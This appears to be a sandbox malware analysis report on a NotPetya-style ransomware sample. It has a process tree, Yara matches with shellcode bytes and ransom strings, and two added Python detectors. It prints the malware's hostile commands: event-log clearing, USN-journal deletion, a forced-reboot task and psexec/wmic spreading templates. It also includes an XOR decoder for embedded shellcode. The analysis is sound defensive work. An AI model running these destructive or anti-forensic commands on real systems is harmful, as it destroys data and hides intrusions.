
Windows Analysis Report
p2pWin.exe

Overview

General Information

Sample Name: p2pWin.exe
Analysis ID: 1346554
MD5: 8c64181ff0dc12c87e443aae94bf6650
SHA1: e91d7ebd17912785caa3e71ef1571dc01b1cd854
SHA256: 4c0153b979e65346c1d6f863086082ec5ef103cbf6b0f5e8652d61da678a8ca5
Tags: exe, keygroup777, MBRlock

Detection

Petya / NotPetya, Mimikatz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Yara detected NotPetya
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Detected Petya / NotPetya (based on Eternalblue SMBv1 Shellcode pattern)
Yara detected Mimikatz
Infects executable files (exe, dll, sys, html)
Writes directly to the primary disk partition (DR0)
Clears the journal log
Contains functionality to access PhysicalDrive, possible boot sector overwrite
Machine Learning detection for sample
Clears the windows event log
Performs an instant shutdown (NtRaiseHardError)
Found PSEXEC tool (often used for remote process execution)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check for running processes (XOR)
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to spread via wmic.exe
Contains functionality to dump credential hashes (LSA Dump)
Infects the VBR (Volume Boot Record) of the hard disk
Found decision node followed by non-executed suspicious APIs
Contains functionality to create an SMB header
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected potential crypto function
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Yara detected PsExec sysinternal tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Enables security privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapter information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • p2pWin.exe (PID: 5320 cmdline: C:\Users\user\Desktop\p2pWin.exe MD5: 8C64181FF0DC12C87E443AAE94BF6650)
    • rundll32.exe (PID: 2284 cmdline: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 1460 cmdline: /c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5824 cmdline: schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15 MD5: 48C2FE20575769DE916F48EF0676A965)
      • F2CD.tmp (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C} MD5: 7E37AB34ECDCC3E77E24522DDFD4852D)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6244 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 3744 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7148 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 1260 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 5800 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 1900 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
  • cleanup
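The process tree above is the whole NotPetya execution chain in five command lines: rundll32 loading a module with a non-DLL extension (the "Execute DLL with spoofed extension" Sigma hit), a one-shot scheduled task that forces a reboot, event-log clearing plus USN-journal deletion, and a credential dumper dropped to %TEMP% and handed a named pipe. The following detector is an added example and not part of the Joe Sandbox report. It runs over constructed process-creation events shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the events are built from the command lines in the tree, not captured logs, and the rule names are the editor's own.

```python
import ntpath
import re
from typing import Dict, List

# Constructed events (not captured logs), shaped like Sysmon Event ID 1 fields and
# built from the command lines in the report's process tree. The last one is a
# benign control that a naive "rundll32 ran" rule would wrongly flag.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1',
     "ParentImage": r"C:\Users\user\Desktop\p2pWin.exe"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15',
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:",
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\F2CD.tmp",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}',
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# First token after the rundll32 executable (quoted or bare) is the module it loads.
_RUNDLL32_MODULE = re.compile(
    r'^\s*(?:"[^"]*rundll32\.exe"|\S*rundll32\.exe)\s+"?([^",\s]+)', re.IGNORECASE)


def rundll32_module(cmdline: str) -> str:
    """Return the module path rundll32 was asked to load, or '' if none found."""
    m = _RUNDLL32_MODULE.match(cmdline)
    return m.group(1) if m else ""


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers (empty list = nothing suspicious)."""
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    low = cmd.lower()
    hits: List[str] = []

    # Sigma-style "Execute DLL with spoofed extension": rundll32 loading a module
    # whose extension is not .dll (the report shows C:\Windows\dllcm.dat #1).
    if image == "rundll32.exe":
        module = rundll32_module(cmd)
        if module and ntpath.splitext(module)[1].lower() != ".dll":
            hits.append("rundll32_spoofed_extension")

    # One-shot scheduled task whose action is a forced reboot (the encrypt-then-reboot step).
    if "schtasks" in low and "/create" in low and "shutdown" in low:
        hits.append("scheduled_forced_reboot")

    # Anti-forensics: clearing Windows event logs and deleting the NTFS USN journal.
    if re.search(r"wevtutil\s+cl\s", low):
        hits.append("eventlog_clear")
    if "fsutil" in low and "usn deletejournal" in low:
        hits.append("usn_journal_delete")

    # Binary run from %TEMP% with a \\.\pipe\{GUID} argument: the dropped credential
    # dumper receives its results over that pipe.
    if "\\appdata\\local\\temp\\" in event["Image"].lower() and r"\\.\pipe\{" in low:
        hits.append("temp_binary_with_named_pipe")
    return hits


def detect(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Map each triggered rule name to the indexes of the events that fired it."""
    findings: Dict[str, List[int]] = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            findings.setdefault(rule, []).append(i)
    return findings


if __name__ == "__main__":
    for rule, idx in detect(SAMPLE_EVENTS).items():
        print(f"{rule}: {[SAMPLE_EVENTS[i]['CommandLine'] for i in idx]}")
```

Each rule is independently useful: the spoofed-extension and USN-journal rules have almost no legitimate hits on workstations, while the event-log-clear and scheduled-reboot rules need an allow-list for patch-management tooling. The benign shell32.dll control event must come back empty; a rundll32 rule that keys on the process name alone will not.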
Malware configuration / threat intelligence match:

Name: MimiKatz
Description: Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks. Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.
Attribution:
  • APT32
  • Anunak
  • GALLIUM
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
No configs have been found
Yara matches on the submitted sample (Source | Rule | Description | Author), matched strings listed under each rule:

p2pWin.exe | JoeSecurity_NotPetya | Yara detected NotPetya | Joe Security
p2pWin.exe | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x19474:$s3: \\.\pipe\%ws
  • 0x19694:$s4: fsutil usn deletejournal /D %c:
  • 0x19948:$s9: process call create "C:\Windows\System32\rundll32.exe
p2pWin.exe | NotPetya_Ransomware_Jun17 | Detects new NotPetya Ransomware variant from June 2017 | Florian Roth
  • 0x15548:$x1: Ooops, your important files are encrypted.
  • 0x1f527:$x1: Ooops, your important files are encrypted.
  • 0x19948:$x2: process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
  • 0x19860:$x3: -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
  • 0x1546e:$x4: Send your Bitcoin wallet ID and personal installation key to e-mail
  • 0x19694:$x5: fsutil usn deletejournal /D %c:
  • 0x1cef0:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
  • 0x198f0:$s1: %s /node:"%ws" /user:"%ws" /password:"%ws"
  • 0x19474:$s4: \\.\pipe\%ws
  • 0x196d8:$s5: schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
  • 0x1982a:$s6: u%s \\%s -accepteula -s
  • 0x197bc:$s7: dllhost.dat
p2pWin.exe | fe_cpe_ms17_010_ransomware | probable petya ransomware using eternalblue, wmic, psexec | ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
  • 0x15368:$dmap01: \\.\PhysicalDrive
  • 0x197fc:$dmap01: \\.\PhysicalDrive
  • 0x197fc:$dmap02: \\.\PhysicalDrive0
  • 0x197f4:$dmap03: \\.\C:
  • 0x194ec:$dmap04: TERMSRV
  • 0x199ec:$dmap05: \admin$
  • 0x19a06:$dmap05: \admin$
  • 0x19f06:$dmap06: GetLogicalDrives
  • 0x19ee0:$dmap07: GetDriveTypeW
  • 0x1f433:$msg01: WARNING: DO NOT TURN OFF YOUR PC!
  • 0x1f455:$msg02: IF YOU ABORT THIS PROCESS
  • 0x1f47d:$msg03: DESTROY ALL OF YOUR DATA!
  • 0x1f497:$msg04: PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED
  • 0x15556:$msg05: your important files are encrypted
  • 0x1f52e:$msg05: your important files are encrypted
  • 0x153e2:$msg06: Your personal installation key
  • 0x1f7c8:$msg06: Your personal installation key
  • 0x15926:$msg07: worth of Bitcoin to following address
  • 0x1f722:$msg07: worth of Bitcoin to following address
  • 0x1f4d4:$msg08: CHKDSK is repairing sector
  • 0x1f342:$msg09: Repairing file system on
p2pWin.exe | doublepulsarxor_petya | rule to hit on the xored doublepulsar shellcode | patrick jones
  • 0x177e0:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE
(2 further entries not shown in this extract)
Yara matches on dropped files (Source | Rule | Description | Author):

C:\Windows\dllhost.dat | JoeSecurity_PsExec | Yara detected PsExec sysinternal tool | Joe Security
Yara matches on memory dumps (Source | Rule | Description | Author), matched strings listed under each rule:

00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_NotPetya | Yara detected NotPetya | Joe Security
00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp | fe_cpe_ms17_010_ransomware | probable petya ransomware using eternalblue, wmic, psexec | ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
  • 0x2f38:$dmap01: \\.\PhysicalDrive
  • 0x73cc:$dmap01: \\.\PhysicalDrive
  • 0x73cc:$dmap02: \\.\PhysicalDrive0
  • 0x73c4:$dmap03: \\.\C:
  • 0x70bc:$dmap04: TERMSRV
  • 0x75bc:$dmap05: \admin$
  • 0x75d6:$dmap05: \admin$
  • 0x7ad6:$dmap06: GetLogicalDrives
  • 0x7ab0:$dmap07: GetDriveTypeW
  • 0x3126:$msg05: your important files are encrypted
  • 0x2fb2:$msg06: Your personal installation key
  • 0x34f6:$msg07: worth of Bitcoin to following address
  • 0x3052:$msg10: Bitcoin wallet ID
  • 0x30c8:$msg12: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
  • 0x2d88:$functions01: need dictionary
  • 0x718c:$functions02: ComSpec
  • 0x80f6:$functions03: OpenProcessToken
  • 0x7a6e:$functions04: CloseHandle
  • 0x7bcc:$functions05: EnterCriticalSection
  • 0x7d66:$functions06: ExitProcess
  • 0x7c5a:$functions07: GetCurrentProcess
00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp | doublepulsarxor_petya | rule to hit on the xored doublepulsar shellcode | patrick jones
  • 0x53b0:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE
00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp | doublepulsardllinjection_petya | rule to hit on the xored doublepulsar dll injection shellcode | patrick jones
  • 0x5d27:$doublepulsardllinjection_petya: 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC ...
00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_NotPetya | Yara detected NotPetya | Joe Security
(19 further entries not shown in this extract)
Yara matches on unpacked PEs (Source | Rule | Description | Author), matched strings listed under each rule:

0.2.p2pWin.exe.4d890.3.raw.unpack | NotPetya_Ransomware_Jun17 | Detects new NotPetya Ransomware variant from June 2017 | Florian Roth
  • 0x3297:$x1: Ooops, your important files are encrypted.
  • 0xc60:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
0.1.p2pWin.exe.4c050.2.raw.unpack | NotPetya_Ransomware_Jun17 | Detects new NotPetya Ransomware variant from June 2017 | Florian Roth
  • 0x4ad7:$x1: Ooops, your important files are encrypted.
  • 0x24a0:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
0.1.p2pWin.exe.4d890.1.raw.unpack | NotPetya_Ransomware_Jun17 | Detects new NotPetya Ransomware variant from June 2017 | Florian Roth
  • 0x3297:$x1: Ooops, your important files are encrypted.
  • 0xc60:$x7: 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E 00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00
1.2.rundll32.exe.2ce5020.2.unpack | JoeSecurity_NotPetya | Yara detected NotPetya | Joe Security
1.2.rundll32.exe.2ce5020.2.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x12444:$s3: \\.\pipe\%ws
  • 0x12664:$s4: fsutil usn deletejournal /D %c:
  • 0x12918:$s9: process call create "C:\Windows\System32\rundll32.exe
(81 further entries not shown in this extract)
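The doublepulsarxor_petya rule above matches a 35-byte run of the embedded kernel shellcode in its XOR-obfuscated form; the many 0xCC bytes are the tell, since shellcode is full of zero bytes and a single-byte XOR maps every zero to the key. The example below is added by the editor and is not part of the report or of the Yara rule: it recovers the key from the byte frequency, decodes the fragment, and then turns that idea into a key-agnostic scan for the plaintext `mov ecx, 0x176 ; rdmsr` sequence (a read of IA32_SYSENTER_EIP, the usual first step of x86 EternalBlue/DoublePulsar kernel shellcode) so the check still fires if a variant changes the key. The decoded instruction reading is the editor's interpretation of the bytes; the carrier blob in the demo is constructed.

```python
from collections import Counter
from typing import List, Tuple

# The 35 bytes the doublepulsarxor_petya rule matched at 0x177e0 in p2pWin.exe,
# copied from the Yara strings listed in the report.
ENCODED = bytes.fromhex(
    "FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC"
    " 27 5C 97 75 BA CD CC CC C3 FE"
)

# Plaintext expected inside x86 EternalBlue/DoublePulsar kernel shellcode:
#   B9 76 01 00 00   mov ecx, 0x176   ; IA32_SYSENTER_EIP
#   0F 32            rdmsr            ; yields a pointer into ntoskrnl
RDMSR_SYSENTER_EIP = bytes.fromhex("B9 76 01 00 00 0F 32")


def recover_xor_key(data: bytes) -> int:
    """Guess a single-byte XOR key. Shellcode carries many 0x00 bytes (imm32
    padding, small rel32 offsets), so the most frequent ciphertext byte is
    most likely key ^ 0x00, i.e. the key itself."""
    return Counter(data).most_common(1)[0][0]


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR; it is its own inverse, so this also encodes."""
    return bytes(b ^ key for b in data)


def find_xored_signature(blob: bytes, signature: bytes = RDMSR_SYSENTER_EIP) -> List[Tuple[int, int]]:
    """Key-agnostic scan: XOR the plaintext signature with each of the 256
    possible keys and search the blob for every result. Returns (offset, key)
    pairs. The Yara rule above does the same for the one key this sample used."""
    hits: List[Tuple[int, int]] = []
    for key in range(256):
        needle = xor_decode(signature, key)
        pos = blob.find(needle)
        while pos != -1:
            hits.append((pos, key))
            pos = blob.find(needle, pos + 1)
    return hits


if __name__ == "__main__":
    key = recover_xor_key(ENCODED)
    plain = xor_decode(ENCODED, key)
    print(f"key=0x{key:02x} decoded={plain.hex(' ')}")
    # Constructed carrier: zero padding around the fragment, not a real file.
    print(find_xored_signature(b"\x00" * 16 + ENCODED + b"A" * 8))
```

Decoded with key 0xCC the fragment begins `31 C0 40` (xor eax,eax; inc eax) and ends with the `mov ecx,0x176 / rdmsr` pair, which is what makes the XOR-at-0xCC Yara string so specific. The brute-force variant costs 256 substring searches per buffer, cheap enough to run over every SMB payload or dropped file, and it catches the same shellcode under any single-byte key; it does not help against a multi-byte or rolling key, for which the frequency trick also fails.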

            Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, CommandLine: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\user\Desktop\p2pWin.exe, ParentImage: C:\Users\user\Desktop\p2pWin.exe, ParentProcessId: 5320, ParentProcessName: p2pWin.exe, ProcessCommandLine: "C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1, ProcessId: 2284, ProcessName: rundll32.exe
            No Snort rule has matched

            AV Detection

Source: p2pWin.exe | ReversingLabs: Detection: 59%
Source: p2pWin.exe | Avira: detected
Source: p2pWin.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E5189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,FindCloseChangeNotification, 1_2_02E5189A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree, 1_2_02E51E51
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam, 1_2_02E51B4E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree, 1_2_02E51C7F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext, 1_2_02E51424
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E51BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree, 1_2_02E51BA0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 1_2_02E52466
Source: p2pWin.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: p2pWin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb x source: dllhost.dat.1.dr
Source: Binary string: c:\src\Pstools\psexec\SVC\Release\psexesvc.pdb source: dllhost.dat.1.dr
Source: Binary string: lsasrv.pdb source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lsasrv.pdbUGP source: F2CD.tmp, 00000004.00000003.1635517667.000000000282C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\src\Pstools\psexec\EXE\Release\psexec.pdb source: dllhost.dat.1.dr
Source: Binary string: C:\Zeus \PC\documents\visual studio 2010\Projects\Keygroup\Release\Keygroup.pdb source: p2pWin.exe

            Spreading

Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\SysWOW64\rundll32.exe | System file mapped for write: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: dllhost.dat.1.dr | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E59987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$ 1_2_02E59987
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_02E598AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError, 1_2_02E598AB
